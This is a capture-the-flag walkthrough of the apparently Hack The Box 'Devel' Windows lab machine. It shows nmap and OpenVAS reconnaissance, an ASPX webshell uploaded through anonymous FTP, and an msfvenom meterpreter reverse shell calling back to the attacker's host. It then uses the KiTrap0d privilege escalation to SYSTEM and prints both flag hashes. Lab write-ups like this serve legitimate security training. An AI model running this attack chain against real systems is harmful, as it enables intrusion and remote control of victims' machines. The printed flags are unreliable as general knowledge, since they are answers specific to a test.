Machine IP : 10.10.10.5 System : Windows
I start by modifying my
/etc/hosts file to avoid writing the IP everytime :
Then I look for open ports and start an openvas scan:
nmap -p- devel -Pn Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 21:03 CEST Nmap scan report for devel (10.10.10.5) Host is up (0.034s latency). Not shown: 65533 filtered ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 105.86 seconds
Now I can start nmap scripts on the open ports to gather more information:
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 21:17 CEST Nmap scan report for devel (10.10.10.5) Host is up (0.033s latency). PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 02:06AM <DIR> aspnet_client | 03-17-17 05:37PM 689 iisstart.htm |_03-17-17 05:37PM 184946 welcome.png | ftp-syst: |_ SYST: Windows_NT 80/tcp open http Microsoft IIS httpd 7.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds
My OpenVAS scan is now finished, from nmap and OpenVas here is what I know:
|80||Microsoft IIS httpd 7.5|
|CVE-2015-1635||IIS||MS15-034 HTTP.sys Remote Code Execution Vulnerability (remote check)||High|
|none||FTP||Anonymous FTP Login Reporting||Medium|
|none||IIS||Microsoft IIS Default Welcome Page Information Disclosure Vulnerability||Medium|
|CVE-2010-3332||IIS||Microsoft ASP.NET Information Disclosure Vulnerability (2418042)||Medium|
|none||FTP||FTP Unencrypted Cleartext Login||Medium|
Now that I have a list of CVE I can see if they are included in metasploit and try them out.
I start Metasploit with
msfconsole and search for the first CVE.
msf5 > search 2015-1635 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/dos/http/ms15_034_ulonglongadd normal Yes MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service 1 auxiliary/scanner/http/ms15_034_http_sys_memory_dump normal Yes MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
Even though there seems to be some kind of exploits, none can grant me enough information to retrieve the flags. Let’s recap what I have at my disposal:
- an IIS server
- an anonymous ftp access
The anonymous ftp access lets me get and push files to the server public files. I should be able to push a webshell and access it from the server.
First I retrieve a standard aspx webshell from the ones included in my Parrot distribution.
cp /usr/share/webshells/aspx/cmdasp.aspx .
Then I push it to the server with my anonymous ftp access
ftp devel Connected to devel. 220 Microsoft FTP Service Name (devel:braincoke): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> put cmdasp.aspx local: cmdasp.aspx remote: cmdasp.aspx 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 1442 bytes sent in 0.00 secs (12.3892 MB/s) ftp>
Now I can access http://10.10.10.5/cmdasp.aspx and start sending command through the form.
If we try
whomami we get
Getting a better shell
Using the shell from the form is quite impractical. To be more comfortable I will use a reverse shell generated from
First I create the shell it will listen on port
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe
Next I upload the shell to the server with my
ftp connection, I make sure to set the exchange type to
Connected to devel. 220 Microsoft FTP Service Name (devel:braincoke): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> binary 200 Type set to I. ftp> put shell.exe local: shell.exe remote: shell.exe 200 PORT command successful. 125 Data connection already open; Transfer starting. 226 Transfer complete. 73802 bytes sent in 0.07 secs (1.0353 MB/s)
Now I can start
msfconsole and a listener. To do so I use
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set LHOST 10.10.14.4 LHOST => 10.10.14.4 msf5 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on 10.0.2.15:4444
My listener is started, I can execute the payload by passing the command
C:\inetpub\wwwroot\shell.exe to the form.
Immediately, I can see that my listener is being activated:
[*] Sending stage (179779 bytes) to 10.10.10.5 [*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.5:49158) at 2019-09-29 17:31:48 +0200 meterpreter > ls Listing: c:\windows\system32\inetsrv ==================================== Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100666/rw-rw-rw- 138752 fil 2009-07-14 02:11:35 +0200 AppHostNavigators.dll 100777/rwxrwxrwx 125440 fil 2009-07-14 02:10:51 +0200 InetMgr.exe
With my newly acquired meterpreter shell let’s get some more information about the system:
meterpreter > sysinfo Computer : DEVEL OS : Windows 7 (Build 7600). Architecture : x86 System Language : el_GR Domain : HTB Logged On Users : 0 Meterpreter : x86/windows meterpreter >
I can try to get a root shell with
getsystem. In my case it didn’t work.
meterpreter > getsystem [-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted: [-] Named Pipe Impersonation (In Memory/Admin) [-] Named Pipe Impersonation (Dropper/Admin) [-] Token Duplication (In Memory/Admin)
I will have to try other ways to get my privilege escalation. A good list can be found here.
After trying multiple things, and keeping in mind that I am targeting Windows 7, I decided to try
To configure the exploit I first set my current shell in the background:
meterpreter > background [*] Backgrounding session 1...
Then I select my exploit with
use windows/local/ms10_015_kitrap0d and configure it:
msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1 SESSION => 1 msf5 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.4 LHOST => 10.10.14.4 msf5 exploit(windows/local/ms10_015_kitrap0d) > set LPORT 4444 LPORT => 4444
Finally I can run the exploit
msf5 exploit(windows/local/ms10_015_kitrap0d) > run
Unfortunately it does not work. But sometimes an exploit needs to be run multiple times to work. After more tries I finally get my privilege escalation:
[*] Started reverse TCP handler on 10.10.14.4:4444 [*] Launching notepad to host the exploit... [+] Process 2384 launched. [*] Reflectively injecting the exploit DLL into 2384... [*] Injecting exploit into 2384 ... [*] Exploit injected. Injecting payload into 2384... [*] Payload injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (179779 bytes) to 10.10.10.5 [*] Meterpreter session 3 opened (10.10.14.4:4444 -> 10.10.10.5:49158) at 2019-09-29 18:33:36 +0200 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
Now getting the flags is a piece of cake:
meterpreter > cat C:/Users/Administrator/Desktop/root.txt.txt e621a0b5041708797c4fc4728bc72b4b meterpreter > cat C:/Users/babis/Desktop/user.txt.txt 9ecdd6a3aedf24b41562fea70f4cb3e8